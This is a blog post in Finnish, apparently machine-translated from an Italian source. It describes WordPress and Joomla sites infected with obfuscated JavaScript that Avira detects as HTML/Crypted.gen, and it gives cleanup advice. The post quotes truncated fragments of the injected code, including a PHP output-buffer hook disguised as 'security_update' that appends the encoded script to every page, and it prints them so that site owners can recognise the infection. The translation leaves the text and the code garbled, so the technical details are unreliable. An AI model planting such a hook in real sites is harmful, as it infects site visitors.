Mielenkiintoinen selitys hyökkäyksen tehnyt imaginepaolo http://www.settorezero.com/ :

Se tapahtuu useammin tapahtumat, että monet sivustot perustuu WordPress ja Joomla ovat hyökänneet tavalla tai Troijan raportoitu Avira HTML / Crypted.gen. Tiedä, jos tämä on ongelma vikoja näissä kahdessa julkaisujärjestelmät (mutta epäilen sitä) tai pikemminkin siltä, että virus hyökkäsi palvelimet että vastaanottavan tällaisia sivustoja.

Jälkimmäisessä tapauksessa olin tukee se, että kaikki ihmiset otin yhteyttä ja joka on ollut sama ongelma, kaikki ovat isännöi samana mukaan. Sit vielä maksut nyt, koska se on hieman poikkeava ja verkostoitumista enkä ole löytänyt riittävästi tietoa, jotta oletus voimassa, joten minun on vain arvauksia ja otettava sellaisenaan.

Samaan aikaan toivon, että tämä viesti voi olla hyödyllistä ja keskustellaan ymmärtää, missä ongelma on peräisin.

Ensinnäkin on sanottava, että virus muuttaa sivuja (mutta ei aina kaikille sivuille), joiden tunniste html, php, asp ja JS lisäämällä salattu javascript-koodin, joka alkaa enemmän tai vähemmän kuin tämä:

  "javascript" > $a = \ "Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0} <script Kieli = "javascript"> $ = \ "Z64dZ3dZ22q | jos | qdu] qwys rub8tqiZ3c0 ^ e)) 

Sanon "enemmän tai vähemmän", koska kaikki eivät näyttää samalta, mutta se on helppo tunnistaa haitallisen koodin, koska näemme, on hieman himmentää: avainsanat eivät ole lukenut, mutta vain sarjoissa merkkiä näennäisesti järjetöntä.

Suhteellisen WordPress kuitenkin haitallisen koodin yleensä lisätään jokaiselle sivulle "index.php" ja alkaa näin:

1

( "security_update" ) ; function security_update ( $buffer ) { return $buffer . "<script language= \" javascript \" > $a = \" Z64dZ3dZ22q|se|qdu]qwys^e} <? Php ob_start (security_update ")-toiminnon security_update ($ puskuri) (return $ puskuri." <script Language= \" javascript \"> $ = \ "Z64dZ3dZ22q | jos | qdu] qwys ^ e)

Näyttää siltä, että kirjoitus ei aiheuttaa vahinkoa ja todetaan vain Avira (nopea). Ongelma on ratkaistu poistamalla komentosarjan sivuilta haitallisiksi tai maksujen normaali kopio sivujen palvelimelle.

Jotkut käyttäjät kuitenkin saatuaan virus, se löytyy kopio sivuston (tai muu www-sivut) tallennetaan tietokoneeseen tämän ongelman, niin hyökkäys näyttää "paikallisia" eikä etäinen: sivut näyttävät kimppuun samassa tietokoneessa, jossa he asuvat. Tämä saa minut ajattelemaan yhä enemmän se hosting ongelma: itse asiassa monet ovat heidän PC ja kopio tartuntalähde, kun palvelin on kuitenkin esitettävä tämä kirjoitus sivua.

Ratkaisu voisi viedä on aina ajankohtainen varmuuskopio sinun sivustoon tietokoneella ja tilata enintään verkkosivuilla, kun ei ole toimitettu.

Lainaan tässä muutamia hyödyllisiä linkkejä (enimmäkseen wordpress) liittyvä ongelma edellä:

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://www.wordpress-it.it/forum/topic/12452

WordPress 2.8.5, yli 100 Hacker hyökkäykset Aruba

Related Posts

• Ei aiheeseen liittyviä post

Mainos